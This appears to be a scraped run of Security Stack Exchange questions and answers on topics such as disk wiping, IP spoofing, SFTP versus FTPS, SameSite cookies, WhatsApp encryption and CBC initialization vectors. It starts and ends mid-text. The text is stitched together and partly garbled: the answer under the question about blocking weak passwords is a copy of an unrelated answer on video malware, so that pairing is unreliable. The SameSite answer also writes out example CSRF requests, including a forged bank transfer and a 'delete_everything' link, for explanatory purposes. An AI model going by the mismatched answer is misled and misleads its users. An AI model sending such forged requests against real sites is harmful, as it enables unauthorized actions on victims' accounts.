</IfModule> Using mod_rewrite, I can feed you non-malicious pages. I can send you elsewhere, do whatever I'd like. Further, I can change payloads e.g.: instead of feeding you malicious, I can just change it to a non-malicious "Hello World" javascript. This may trick you into thinking my malicious website is harmless. Normally when I have to visit a malicious website, I have a virtualized sandbox which runs burpsuite for interception, Squid proxy server, and a few other tools (noscript, ghostery, etc). What is the ultimate purpose of visiting outside of curiosity? | {
"source": [
"https://security.stackexchange.com/questions/121610",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/46520/"
]
} |
121,673 | If the goal is to make data no longer retrievable, how secure is it to format the disk? I assumed formatting the disk overwrites free space (thus making it a safe bet no one's going to be able to retrieve the data) but according to webopedia this is not the case. How much more secure is it to delete files with an erasure utility (using something like Schneier's method )than formatting the drive? How does formatting the drive not erase all data: formatting involves recreating the file system so this seems to imply the data is not retrievable. I generally do not choose the "quick format" option. | Quick-formatting a hard disk simply erases the filesystem's structures and tables and writes new ones in place, giving the illusion of a brand new disk. Old data is simply overwritten as and when needed, but it still remains on the disk. File carving utilities can go through the disk data and recover fragments of files, then stitch them back together without needing the original filesystem entries. This is commonly offered in commercial "undelete" applications, but more comprehensive methods are available in forensics packages. Wiping a disk with a single pass of random data (or zeroes, or whatever really) is sufficient to fully remove all traces of the data from the overwritten sectors. Multiple passes are pointless on modern disks, even against the perceived threat of hardware-level recovery attacks. I refer you to this question for details, but the short answer is that old techniques like magnetic force microscopy (MFM) were never really effective at recovering overwritten data in the first place on low-density devices, and newer magnetic disks have such high densities that it's physically impossible. Multi-pass overwrites are there to help people validate their need for über-security, or sell magic disk wiping software, despite it being pointless and detrimental to disk longevity. The only exception is flash (e.g. USB flash drives and SSD), which have additional wear-leveling sectors to increase the lifespan of the device. The physical sectors are exposed as a logical map to the system, which makes it impossible to directly overwrite all of the data. Even if you overwrite all the logical sectors, old data might remain in the wear-leveling sectors. In order to combat this, some flash device specifications include an encryption requirement to increase the difficulty of recovery (because it is no longer possible to directly read data from the memory chips using hardware probes). In SSDs, encryption can be used to speed up the ATA Secure Erase feature. All sectors on the disk are encrypted using a key stored in hardware, and this key can be discarded and a new one generated when a Secure Erase command is sent to the device, thus rendering all data on the disk (including slack / wear-leveling areas) unreadable. Secure Erase is also possible without encryption, but then the drive must actually delete all memory cells, which may take a while. | {
"source": [
"https://security.stackexchange.com/questions/121673",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10714/"
]
} |
121,687 | Someone recently told me that the NSA could impersonate pretty much anyone they want by using IP address spoofing on the Internet.
But how would that work and to what extend is it true anyway? Could any ISP in the world just spoof any IP address they wanted or is there some kind of protection against that? | IP Spoofing is NOT IP Hijacking which is causing confusion for anyone reading this. IP Spoofing at its minimum / bare bones explanation is also called impersonation. Let's have an ASCII look at what it does, and how it happens: You (1.2.3.4) --> connect to your bank --> Bank (2.2.2.2) In spoofing, I can pretend to be anyone I want, if I am on your network: Me (1.2.3.4) to you --> I am 2.2.2.2 --> You
Me (1.2.3.4) to you --> I am Google.com --> You This is a moot point because if you respond, I will NEVER see the response, I am not 2.2.2.2 nor Google. This is called blind spoofing . For impersonation , I want to pretend to be your bank without you knowing this, because I want to steal your money. Therefore I need to see your responses and your bank's response. Now I have to perform multiple impersonations. I have to pretend to you, that I am your bank, and I have to pretend to your bank, that I am you: Me (1.2.3.5) --> to your ROUTING handler (be it a router or your routing table)
Me (1.2.3.5) --> I am 2.2.2.2 --> You
Me (1.2.3.5) --> I am 1.2.3.4 --> Your bank For this to occur I MUST be in your infrastructure. Think of this as a proxy server. Using a proxy server the connection is the same: Me (1.2.3.5) --> proxy server (1.2.3.10) --> Bank (2.2.2.2)
Bank responds --> proxy server --> Me Traffic needs to flow to and from. In an IP Hijacking scenario, data is relayed, hence there is no spoofing (I can proxy to see everything) BGP Hijacking enables watching the wire. Someone ON the network that is performing the hijacking can then perform the spoofing. Now in the case of an ISP/NSP/NAP, a government may take this approach: You (1.2.3.4) --> ISP (1.2.3.1 default route) --> Bank (2.2.2.2) # Normal connection In the above, this would be the non-tampered session that would occur. In say an NSA tapped network this is what would occur: You (1.2.3.4) --> ISP (1.2.3.1) --> internal ISP proxy <-- NSA (1.2.4.1) --> Bank (2.2.2.2) From your perspective, you are connecting to your ISP, then to your bank. You will never (and can never) see the proxying occurring. This is the kind spoofing/masquerating/impersonation done with systems created by companies like Narus that used a tap at AT&T to tap main connections. There is little to be done on a scale of eavesdropping like this, as government agencies have the capabilities of using SSL certificates, and other means to prevent you from knowing what is going on. VPN tunneling won't prevent it, as you are at the mercy of your provider, and a warrant is a warrant. There is no need for "BGP Hijacking", BCP filtering to even enter this discussion as BCP filtering will not counter the above proxy example. BCP filtering covers spoofing, not proxying, nor hijacking. If an attacker manages to manipulate the routing table on say your operating system, BCP is a moot point. | {
"source": [
"https://security.stackexchange.com/questions/121687",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/50144/"
]
} |
121,723 | I'm dealing with a server that isn't mine to configure. Something somewhere between me and this server kills any connection after 5 minutes if no traffic passes between the two machines. This includes active connections where a command is running on the server; specifically, I've demonstrated that this disconnection occurs using an SSH connection (running a bash command that doesn't print any output for more than 5 minutes) and a SQL database (running a SQL command that lasts more than 5 minutes). It also disconnects if I go read something and don't send any commands for 5 minutes, of course. For the SSH setting, the group responsible for the server has recommended that I enable keep alive client side. They haven't provided any suggestions for the database connections. I'm completely confused, though. What is the security benefit here? For SSH, I can bypass their settings completely from the client side, and they even recommend doing so. (The latter means there cannot even be a "security through obscurity" argument, since it won't be obscure because every user will need to know about it. Not that I think this would foil an attack even if it were obscure, especially since I found out on my own before they even recommended it.) For both, this demonstrably degrades availability. I could potentially see that disconnecting active sessions after a few hours of inactivity might be beneficial (Although the possible threats of long open sessions aren't immediately clear to me.), but every 5 minutes ? This means I can't even read a DBA.SE post while I'm working out my SQL without being disconnected. Is this as ludicrous as it sounds to me, or is there something I'm missing? Clarifications Some points have been mentioned in comments, so I'd like to clarify a little. I am able to consistently reproduce the timeout at 5 minutes. I used commands that record a timestamp server side every few seconds, and after a disconnect, the last timestamp recorded was always exactly 5 minutes after the first timestamp. So the disconnects were never sporadic. Shortly after I wrote this post, the system/network admins responded that this is indeed intentional. I quote, "More fallout from the 5 min time limit set on the F5s a few weeks back?" I'm not sure what an F5 is; some Googling suggests it's a very expensive switch, which corresponds to someone who was trying to find a workaround for my DB connections later mentioning the switch settings. (I don't believe this information invalidates any answers.) | This sounds like a good example of a security "cargo cult" . A security control has been implemented blindly without understanding the context involved or indeed implementing it correctly. Generally speaking in security the point of an idle timeout it to reduce the risk of situations where a client machine is left unattended and a malicious user gets to the machine and executes unauthorised commands on it. The balance in these timeouts tends to be one of usuability (which favours longer or no timeout) and security (which favours shorter timeouts). You can sometimes spot security cargo culting with exactly what you've mentioned which is that the operators of the system are actually helping you bypass the nominal control (in your case by recommending keep-alives be used) | {
"source": [
"https://security.stackexchange.com/questions/121723",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/46979/"
]
} |
121,759 | I had an exchange with some third party sysadmin yesterday regarding the setup of a file transfer interface between our servers. I suggested using SFTP because our application has good support for it. My interlocutor absolutely wants FTP+S (FTP+TLS) which we currently don't support and would need to develop. I argued that I did not see any real benefit in FTP+S over SFTP since both offer solid traffic encryption. SFTP is readily available and can be made even more secure with public key authentification. Last but not least, its single connection mode makes it much nicer to use behind corporate firewalls. The sysadmin almost called me an idiot, stating that SFTP works on top of SSH which is a protocol designed for administration purpose, and that opening a SSH port for any other use than administration is clearly a bad idea because it opens a broad attack vector against the host system. I am wondering if this argument is valid. There seem to be various ways to restrict a SSH session to only allow SFTP file transfer. There is the internal-sftp subsystem that comes with openSSH, where you can easily set up a chroot and disable TCP forwarding. I even heard about solutions that presumably allow users to connect via SFTP without requiring an entry in the passwd file... I do not see any clear problem with SFTP that you would not have with FTP+S, but I could be missing something? So, despite of the restrictions that you can apply to SSH, is FTP+S a better option for file transfers, security wise? | From the security they provide in theory FTPS and SFTP are similar.
In practice you have the following advantages and disadvantages: With FTPS client applications often fail to validate the certificates properly, which effectively means man in the middle is possible. With SFTP instead users simply skip information about the host key and accept anything, so the result is the same. But users and admins with more knowledge could make use of SSH keys properly and use these also for authentication which then makes SFTP much easier to use compared to using passwords. And if passwords are forbidden at all then this is also more secure because brute force password attacks are no longer possible. FTP uses dynamic ports for data connections and information about these ports is transferred in-band. This makes already plain FTP (without TLS) a nightmare when firewalls, NAT or similar is involved. With FTPS (FTP+TLS) this gets even worse because due to the encryption of the control connection helper applications on the firewall can no longer find out which ports need to be opened. This means that to pass FTPS you would need to open a wide range of ports which is bad for security(*). SFTP is much better because it uses only a single connection for control and data. FTP(S) servers often provide anonymous access and SFTP servers usually don't. Several FTP(S) servers also offer pseudo users, i.e. users taken from same database or similar which are not real users on the system. If you have proper users only anyway this does not matter. SFTP uses the SSH protocol and you have to configure the system properly to only allow SFTP access and not also SSH (terminal) access or even SSH forwarding. With FTP this is easier because FTP can do only file transfer anyway. (*) Several comments do not really believe that having a wide range of ports open is bad for security. Thus let me explain this in more detail: FTP uses separate TCP connections for data transfer. Which ports are used for these connection are dynamic and information about these gets exchanged inside the control connection. A firewall which does not know which ports are in use currently can only allow a wide port range which maybe will be used sometimes FTP. These ports need to allow access from outside to inside because in FTP passive mode the client connects to some dynamic port on the server (i.e. relevant for server side firewall) and for FTP active mode the server connects to some dynamic port on the client (relevant for client side firewall). Having a wide range of ports open for unrestricted access from outside to inside is not what somebody usually considers a restrictive firewall which protects the inside. This is more similar to having a big hole in the door where a burglar might come into the house. To work around this problem most firewalls employ "helpers" for FTP which look into the FTP control connection to figure out which ports need to be opened for the next data connection. One example is ip_conntrack_ftp for iptables. Unfortunately with FTPS the control connection is (usually) encrypted so these helpers are blind and cannot dynamically open the required ports. This means either FTP does not work or a wide range of ports need to be open all the time. | {
"source": [
"https://security.stackexchange.com/questions/121759",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109004/"
]
} |
121,794 | I have a website which is basically a service platform. As far as I know there is no malware in my website (at least not found according to these free scanners). However, Check Point malware database definition is blocking requests to my website because it is somehow detecting a malware, whose details is something like this: Connection to IP associated by DNS trap with malicious domain. See
sk74060 for more information. Screenshot: As far as I understand, my website is being detected falsely (a false positive). How do I circumvent this? | Your website www.sheba.xyz is hosted on a shared system together with lots of others. This means that all use the same IP address, 166.62.28.88. Unfortunately, not all of the sites on this IP address play nice, which means that this IP address got reported as a cause of trouble. Unfortunately it is not only Checkpoint which reports this site as bad, but several others too; see report from cymon . There in the timeline you can also see why the IP address got put on the blacklists; namely because it was used as a target of phishing and a distribution point for malware on several domains hosted at this IP address. Which means that the best way to deal with the problem is to talk to your hosting provider so that the bad sites get removed. If this does not help, change your hosting provider to one which cares more (and maybe costs more). | {
"source": [
"https://security.stackexchange.com/questions/121794",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24346/"
]
} |
121,824 | When I was young, and had just started out in my software-development career 20 years ago, I wrote a little bit of code on my Amiga that took a password, but also recorded (within some threshold), the speed at which each letter of a password was typed. This meant that, not only did the user have to type in the right password, they also had to time the key-presses. To test it, I'd have a rhythm in my head and could consistently re-type the password every time. However if I just typed it out regularly, or slowly, it was not accepted. I am no security expert (my programming lies in less-difficult areas, thankfully), but I just suddenly thought about that program I wrote when I was young and whether it was a viable addition to security these days, or whether it's not even worth thinking about. Tap - Taptaptap - TapTap -- Tap . | The term you are looking for is " keystroke dynamics " or "keystroke biometrics" and is an interesting and growing field. The idea is that an individual types certain keys in a certain way that does not change much over time. If you can map those dynamics, then you could, potentially, do away with passwords altogether and simply get the user to type anything . | {
"source": [
"https://security.stackexchange.com/questions/121824",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52016/"
]
} |
121,847 | Without even thinking about it, I typed my password into the Google search bar, but I didn't press enter. Since autocomplete is on, does that mean my password has been logged or indexed somewhere? Would it be a good idea to change my password or is that just being paranoid? | I highly doubt it. You didn't press enter but Google will sometimes send the information to quickly present your results. This is forced over HTTPS. Your information was likely encrypted and not exposed. According to most sources Google processes on average 3.5 billion searches per day. There is no additional information to prove your query is a password. Nor is there any public way for a person to get the search queries of a particular Google user. So they would have to be an actual employee of Google. The likelihood of a internal Google employee to trying your search queries as passwords to your account is highly unlikely. It might not even be possible for most standard Google employees to get such identifying information. But if so, the possibility of one with such access purposely targeting you is astronomical. Again, there is no additional context to prove it is your password. Nor is your user information submitted with your query. So in the event of a MITM attack where they can read your traffic I would still factor it as real low as they would also have to have your username. I am going to flat out say there 99.9% chance you have nothing to worry about. If you are wearing a tin foil hat or still have a nervous tick then change your password. If you don't use this password elsewhere then you're golden since it isn't like they could log in with an old password. Otherwise I would move on and not worry about it. Edit: @reirab made a point it could make it pop up in features that use your search history. I don't believe this happens if you don't press submit. But if you want to be sure clear your search history with Google . I can't be sure this clears it from Google's servers but it should prevent them from popping up in the auto-complete. | {
"source": [
"https://security.stackexchange.com/questions/121847",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109087/"
]
} |
121,912 | We always hear it is safe to run unknown programs as non-root users in Linux because non-root users are sandboxed from the system level and can't change anything out of their permission scope. If need be, as root user one can always delete a non-root user and be confident the rest of the system wasn't affected. However, isn't it possible for a low-level user to install a script with a keylogger, for example, that waits for an su - or sudo call and takes system control from there? | We always hear... Do we? I don't. Installing some untrusted program as a normal user is a bad idea with Linux the same it is with Windows or Mac: this program has access to all your data and can delete these data, send these data to somebody else etc. Moreover it can make screenshots, control other applications running on the same X windows screen (even if they run as a different user), can grab keys (i.e. keylogger),... For details see The Linux Security Circus: On GUI isolation . Apart from that we regularly have privilege escalation bugs even in Linux bugs which can be used by an unprivileged user to get root or even kernel level permissions. Thus don't install any untrusted programs on any kind of system unless you are willing to compromise this system or the data stored on it. | {
"source": [
"https://security.stackexchange.com/questions/121912",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/90486/"
]
} |
121,968 | Since Whatapp started end-to-end encryption with an option for users to verify keys, many government security agencies, like the Indian one, red-flagged such use of encryption. Now, Yesterday the Parliament was informed by Communications and IT Minister Ravi Shankar Prasad that Security/law enforcement agencies face difficulty while dealing with encrypted communications by various application service providers including end-to-end encrypted communication messages provided by Whatsapp. However, security agencies are able to intercept these encrypted communication services through the lawful interception facilities provided by the telecom service providers. Is this technologically possible considering its a 256bit? Can government agencies intercept end-to-end encrypted Whatsapp communication services through the lawful interception facilities provided by the telecom service providers? | It's very unlikely that any government agency would crack the encryption. They would need the key. And the only way they could get that is if Whatsapp had a backdoor or weakness in their software which allowed for such a key to be extracted. There is, as of today, no direct evidence that such a backdoor exists in Whatsapp. But, since Whatsapp is closed source, it also becomes difficult to make sure such a backdoor does not exist. However, in terms of information security, what we are interested in is a risk assessment . Considering OP, government agencies are the parties we are being asked about. We should therefore asses that risk. Here is some relevant information regarding that: Whatsapp's parent company, Facebook, has been shown to give the NSA direct, unilatateral access to their servers through something called the PRISM Program. While Facebook denies this , it has been proven by leaked documents . This does not, however, mean that the NSA can decrypt Whatsapp messages. I include this information in the risk assessment as an example of Whatsapp's owner's relationship to the NSA and privacy transparency in general. In 2013, information was released regarding: ( Source ) • NSA and GCHQ unlock encryption used to protect emails, banking and
medical records • $250m-a-year US program works covertly with tech companies to insert weaknesses into products We can absolutely not prove that this large, covert program has in fact worked with Facebook to put such a "weakness" into Whatsapp. However, this information is nevertheless relevant to our risk assessment. If such a weakness was actually implemented, it could compromise the encryption key. Though not absolutely identical, considerably similar things have indeed happened before. Here is one example regarding Skype, Microsoft and the NSA. Conclusion: It is, at present, difficult to conclude one way or the other. Whatsapp's parent company (as well as other companies) have demonstrated in the past that they are willing to give the NSA unilateral access to user data. They have also shown a willingness to lie about it . Given this, it seems difficult to take companies under the control of Facebook at their word regarding this particular subject. When we evaluate the degree of risk in regards to malware, a virus, being hacked, data loss, data theft, surveillance, etc, it is not only relevant if something is proven . It is also relevant if something is possible or even likely . While, in this particular case, there may not be sufficient grounds to say that the NSA gaining access to Whatsapp encryption keys is likely , it is definitely possible , given the history of these entities. This is something people can take into consideration when evaluating such a situation. Related reading: New Snowden Documents Detail How NSA Can Bypass Common Internet Encryption (International Business Times) Microsoft handed the NSA access to encrypted messages (The Guardian) Revealed: how US and UK spy agencies defeat internet privacy and security (The Guardian) PRISM (surveillance program) (Wikipedia) | {
"source": [
"https://security.stackexchange.com/questions/121968",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109229/"
]
} |
121,971 | I must say, that I like this idea and it seems that it will bring a new form of protection against CSRF and XSS or at least it will reduce those attacks. So, how effective will this protection be? SameSite-cookies is a mechanism for defining how cookies should be
sent over domains. This is a security mechanism developed by Google
and is at this moment present in Chrome-dev (51.0.2704.4) . The purpose
of SameSite-cookies is [try] to prevent CSRF and XSSI-attacks. You can
read the draft here. (Source) | First, a definition from Chrome : Same-site cookies (née "First-Party-Only" (née "First-Party")) allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain. So what does this protect against? CSRF? Same-site cookies can effectively prevent CSRF attacks. Why? If you set the session cookie as same site, it will only be sent if a request emanates from your site. So a standard CSRF attack where the attacker lures the victim to the site http://malicious.com that posts a request to http://bank.com/transfer.php?amount=10000&receiver=evil_hacker will not work. Since malicious.com is not the same site as bank.com , the browser will not send the session cookie, and transfer.php will execute as if the victim was not logged in. This is very similar to how setting a X-Csrf-Token HTTP header protects you from CSRF - again there is something that is only sent if the request emanates from your domain. The same-site property turns your session cookie into a CSRF-token. So problem solved? Well, sort of. There are some caveats: This will only work for browsers that implement this feature. So far, very few do. Unless you want to throw everybody who uses a slightly older browser under the bus, you will still need to implement an old fashioned CSRF-token. If you need more fine-grained control, this will not be enough. If you run a system that displays untrusted user content, like a forum, you don't want requests originating from user posts to be treated as valid. If someone posts a link to http://myforum.com/?action=delete_everything you don't want that to delete anything just because a user clicks it. With a traditional CSRF-token, you can control exactly when it is used. With a same-site cookie, you can not. The same old caveats as for old fashioned CSRF protections still apply. If you have an XSS vulnerability, no CSRF protection in this world will save you. With that said, the same-site cookie is still a good thing that should be used together with traditional defenses as defense in depth. XSS and XSSI? The same-site cookie does nothing to protect you from ordinary XSS attacks. If a hacker manages to fool your site to echo out script from the URL on your site, it will be executed as coming from your origin (after all, it is), and thus session cookies will still be sent with all requests the injected script makes to your domain. If you read the quote in your post carefully, you will see it says XSSI with an I at the end, and not XSS. The I stands for inclusion, and XSSI is related to, but different from, XSS. Here is a good explanation of XSSI and how it differs from XSS: XSSI is a form of XSS that takes advantage of the fact that browsers don't prevent webpages from including resources like images and scripts, which are hosted on other domains and servers. [...] For example, if Bank ABC's site has a script that reads a user's private account information, a hacker could include that script in their own malicious site ( www.fraudulentbank.com ) to pull information from Bank ABC's servers whenever a client of Bank ABC visits the hacker's site. Same-site cookies protects you from XSSI, since a session cookie would not be sent with the request for the script and it would thus not return any sensitive information. However, for ordinary XSS it makes no difference. | {
"source": [
"https://security.stackexchange.com/questions/121971",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/46520/"
]
} |
122,099 | I know that there is already a question related to viruses in videos, but the implication in the other question is that videos in question have been downloaded and played by media software on the target computer. The answer for that question is that yes, viruses can be embedded in videos for this purpose. But what I am instead referring to are videos viewed through browsers (which are technically media software on target computers, if you want to split hairs). Now obviously we are talking about two distinct types of video: flash and HTML5 (MP4, WebM, Ogg). Are either/both of these vulnerable to this sort of exploitation, and if so, how would it operate? Presumably the browsers are somewhat sandboxed, so we would be talking about the browser specifically being targeted, rather than the computer on which the browser is on? | but the implication in the other question is that videos in question have been downloaded and played by media software on the target computer. No it is not. The implication is that there need to be a bug in the code handling the data. For instance the ffmpeg library is used in browsers like Chrome or Firefox and it had several serious bugs in the past . And of course Flash had lots of vulnerabilities too so the problem exists for both HTML5 and Flash based media playing. Presumably the browsers are somewhat sandboxed... This is an assumption which is not necessarily true. Some browsers like Chrome or Edge are sandboxed and some like Firefox are not sandboxed (yet). In case of sandboxes it gets much harder to exploit but it is not impossible as regularly shown at Pwn2Own . | {
"source": [
"https://security.stackexchange.com/questions/122099",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109400/"
]
} |
122,107 | We all know the basics "password rules" when a user register on a website, such as: more than 8 characters, must contain an upper case letter, must contain numbers and so on Why don't websites filter (as in not accept) well-known weak passwords such as: 123456 qwerty password What are the pros and cons of such a method and why is it not widely used? | but the implication in the other question is that videos in question have been downloaded and played by media software on the target computer. No it is not. The implication is that there need to be a bug in the code handling the data. For instance the ffmpeg library is used in browsers like Chrome or Firefox and it had several serious bugs in the past . And of course Flash had lots of vulnerabilities too so the problem exists for both HTML5 and Flash based media playing. Presumably the browsers are somewhat sandboxed... This is an assumption which is not necessarily true. Some browsers like Chrome or Edge are sandboxed and some like Firefox are not sandboxed (yet). In case of sandboxes it gets much harder to exploit but it is not impossible as regularly shown at Pwn2Own . | {
"source": [
"https://security.stackexchange.com/questions/122107",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95611/"
]
} |
122,118 | Passwords have been a problem since the dawn of computing. They tend
to be either so complex that no one can remember them, or so obvious
that anyone could guess them. ... Some users choose to write their passwords down on paper and keep them
in their desk drawers or (even worse) stick the paper to their
computer screens. - ComputerWeekly Assuming that I'm a doors manufacturer trying to avoid passcode-based door locking systems. What other authentication techniques are there that are quicker / easier than passcodes, but don't reduce security? What are pros and cons of each one? | As a general rule to remember: Don't make it to hard to use! If it's to hard to use and you keep forgetting, all you've done is shown that you need a different security method to make your door usable. Things mentioned in this post: Private/Public authentication (keys) UUID pre-authentication (fobs) MFA(specifically 2, fob and code gen) Things mentioned in the do not use section: Biometry Security Guards alone Cameras(security theater) Security Through Obscurity (Handshakes/patterns) Roll Your Own Security Well, with a door there's always physical security like keys to look at. A lock is a private/public system where a physical public key is used to access the internal private mechanism (tumbler). When a user inserts a copy of the public key, they can gain access to the door and can modify its internal states (including unlocking, and locking it themporarily). This can be enhanced further by a timeout that causes the lock to lock itself, preventing follower. Pros Faster (put in place, turn) Easier (one action) Almost as secure as passwords (replication based on sight) User Pre-Approval (only a copy of the public key gains access, so you control in advance who gets it) Strong to interception (someone would have to run a pretty strong grab attack to gain access) Widely accepted and used (most people are already used to the system) Cons Bad users replicating keys and leaving them around (only an issue if someone can find the lock it goes too, but worth mentioning) Bad users giving copies of the key to other people who aren't supposed to have access Bad locksmiths who keep copies of the keys for nefarious reasons Loss prevention (he who has the key, has the power) As you can see above, unless you run into some bad user/ system admin lock smith situations you should be fairly safe as long as you make sure your cipher tumbler is safe against the usual brute force bump key /tamper (lock pick) tactics that exist out there and is installed with long screws and a strong door frame. Okay, let's say you want to completely do away with passwords. Now you can do something called a universally unique identifier (UUID) with pre-registration to the lock. For this you generate a long, hard-to-guess string that gets stored on a device that gets registered with the system in advance. If that generated thing was always registered in advance you can easily change it and try to restore it before you put it on the device to give to the user. Now if the user wants access, they just put the device up against a reader, which confirms the string with your security system, and they gain access! Pros Faster(put against square, wait for light) Easier(one action) More secure than passwords Ease of use(just put it on a small square, and you're in) Pre-registration means easy tracking UUID is so unique it can register every atom in the universe(good luck running out) Impossible to replicate without already knowing the string Cons Bad system users (users with access to the codes internally could cause issues, scripts are you friend) Loss prevention (whoever has the fob, has the power) LOSS PREVENTION Really this system is as secure as a key, but gives the extra advantage of unique "fingerprints" for the device they use to enter the building, meaning you can easily track who comes and who goes with what key. That loss-prevention con is a big one though, as then the person needs to come back, prove they are who they say they are, and you need to invalidate the old key, flag it to watch for someone who stole/found it and tries to gain bad access, and give them a new one with the hopes it won't happen too often. If a key is something that is easily captured or replicated in the part of town your door is going to be installed in, or your users are REALLY bad about loss prevention, you could instead look at pinned unique identifiers like magnetic key fobs and a time-based password delivered over text message or through a special device, which is called 2-Factor Authentication Using this technique, a user is given/makes a password to the security/lock system which is stored in a key fob. Then they register their phone with a service that will generate the other password they need to enter for them upon their request. Now when a user wants to gain access, they present their key fob and enter their password from their phone into the keypad. This provides extra security from bump keys and locksmiths because you can tie a security system into it and analyze who tried to gain illicit access in an incorrect manner so you can lock out their credentials and they have to come and get new ones at security. Pros MUCH stronger security than passwords VERY strong(the password can be good for as little as a minute if you decide to set it up that way Extra security techniques (you can instantiate rate limiting, lockouts, and credential rollover) Pre approval baked in (they have to register with you to even make their fob active) You can know the exact time frame someone logs in unlocks the door based off of the password that got confirmed (once confirmed, write and entry in your security logs) Uniqueness (each fob stores something from the user, and each text is based purely on the pre-authenticated phone number which allows for limitless unique entries in your security system) Cons Loss prevention (if someone loses their phone/fob you have to reissue a whole new credential for that part of entry) Ease of Use (you always have to have these present. If you forget one you have to go get it) Wow, that's a short list of cons with a long list of pros! Heck it even gives you remote security abilities! It's a little hard to implement though since there are a lot of systems that would have to be put in place, but that's not really a con and more of a setup cost. The "do not use" section Biometry is a cool idea, but horrible in practice. This is like fobs, but accuracy can't be guaranteed here, and it can be thwarted with something as simple as silly putty. People also change over time. It's just a bad in practice. Security Guards when used alone is also a don't-use this protocol. They can be overpowered, bribed, subverted, and have biological needs that may cause holes in your security during unknown times. Cameras provide NO SECURITY on their own. They're really more of an addition to security, and can't actually stop something. It's akin to a Security Theater. Sure you could watch it all you want, but really all you're doing is fooling yourself into thinking it's secure. Someone can still break in if a camera is there, and it's really easy to hide from. Handshakes Security through Obscurity is another bad case of security theater. If I have to knock twice, say a phrase, knock again, and then turn turn the key why would I ever use this system? I'd look like an idiot, and someone can just replicate the steps. You gain no more security here than you do with a key, and it's harder to use. Making Your Own Security Protocol/System should be avoided at ALL costs unless you're doing it for research and testing purposes and let EVERYONE bang on it to confirm just how smart you are (or bring you crashing to reality on how bad your idea was). Until it's proven as safe, it's nothing more than a really bad play in the Security Theater showing. | {
"source": [
"https://security.stackexchange.com/questions/122118",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70714/"
]
} |
122,224 | Some of the earliest Bitcoin transactions were signed with a private key most people collectively believe belonged to Satoshi Nakamoto . However, many publications propose Craig Wright may have obtained the private key from the real Nakamoto, then embarked on an elaborate hoax to be an impostor to Nakamoto. What are the most likely ways Craig Wright could have obtained Nakamoto's private key, necessary to carry out this hoax? Edit Apparently Bitcoin Chief Scientist Gavin Adresen is backtracking on his assertion that Mr Write demonstrated he is in possession of private keys owned by Nakamoto. So the premise of the question is likely not true. | Wright did not obtain Nakamoto's private key. What he did provide as evidence was a signature from one of the early bitcoin transactions. However, that signature is from the blockchain and can be looked up by anyone. Wright was able to fool some people from the mainstream media who don't really understand the technical details, but the security community debunked it quite quickly. Security Researcher Dan Kaminsky tweeted on May 2nd : Satoshi signed a transaction in 2009. Wright copied that specific signature and tried to pass it off as new. Also, the official Twitter account of the Bitcoin Core Project tweeted on May 2nd : There is currently no publicly available cryptographic proof that anyone in particular is Bitcoin's creator. By the way, The Economist, the original news outlet who started spreading the claim, has now published a correction . A proper proof of Nakamoto's identity would, for example, be a message reading "My real name is Craig Wright" signed with the Satoshi Nakamoto PGP key or a new bitcoin transaction from a wallet confirmed to be owned by Satoshi Nakamoto. But so far this hasn't happened. Gavin Adresen, chief scientist at the Bitcoin Foundation, claimed to have seen such proof by Wright , but has not posted that proof publicly. Why he would make such a claim without providing any evidence whatsoever for it and expects the world to just trust his word is a mystery. Convincing people of a miracle solely by claiming very sincerely that you saw it with your own eyes might work in certain religious circles, but certainly not in the more scientifically inclined crypto community. By the way: I am the real Satoshi Nakamoto. Prove me wrong. | {
"source": [
"https://security.stackexchange.com/questions/122224",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5372/"
]
} |
122,274 | According to Wikipedia , the initialization vector (IV) does not have to be secret, when using the CBC mode of operation. Here is the schema of CBC encryption (also from Wikipedia): What if I encrypt a plaintext file, where the first block has a known, standardized structure, such as a header? Let's imagine the following scenario: I encrypt file.pnm using AES-CBC . The pnm file has a known header structure, such as: P6
1200 800
255 Moreover, the dimensions (1200 x 800) and color mode (P6) can be guessed from the encrypted file size. If both IV and the first block of plain text are known, doesn't this compromise the whole CBC chain? | I think it's easier to split this into its component parts, and consider them as separate entities: AES and CBC. AES itself does not "basically consist of XORing together chunks of the block" - it's a much more complicated affair. Ignoring the internals of it for a moment, AES is considered secure in that without knowing the key, it's practically impossible to recover the plaintext or any information about the plaintext given only an encrypted block, or even in situations where you're given parts of the plaintext and you need to find the remainder. Without the key, AES might as well be a one-way function (and there are MAC schemes which rely upon this!). Discussing the technicalities around the security of AES and similar block ciphers is extremely involved and not something I can cover in an answer, but suffice to say that thousands of cryptographers have been looking at it for almost two decades and nobody has found anything remotely practical in terms of an attack. The diagram you posted above describes CBC. Block ciphers, such as AES, aim to be secure for encrypting one block with a secret key. The problem is that we rarely want to just encrypt one block, but rather a data stream of indeterminate length. This is where block modes, like CBC, come into play. Block modes aim to make ciphers secure for encrypting multiple blocks with the same key. The most simple block mode is ECB, which offers zero security in this regard. ECB involves independently encrypting each block with the same key, without any data fed between blocks. This leaks information in two ways: first, if you have two identical plaintext blocks, you'll get two identical ciphertext blocks if you use the same key; second, you'll get two identical ciphertext streams for two encryptions of the same message with the same key. This is a problem as it leaks information about the plaintext. CBC solves this problem by introducing a "cascading" effect. Each plaintext block is xor'ed with the previous ciphertext block, resulting in originally equal plaintext blocks no longer being equal at the encryption step, thus no longer producing equal ciphertext blocks. For the first plaintext block, there is no previous ciphertext block (you haven't encrypted anything yet), and this is where the IV comes in. Consider, for a moment, what would happen if instead of an IV we just used zeroes for the -1 th block (i..e the imaginary ciphertext block "before" the first plaintext block). While the cascade effect would make equal plaintext blocks produce different ciphertext blocks, the same entire message would cascade the same way each time, resulting in an identical ciphertext when the same full message is encrypted multiple times with the same key. The IV solves this. By picking a unique IV, no two ciphertexts are ever the same, regardless of whether the plaintext message being encrypted is the 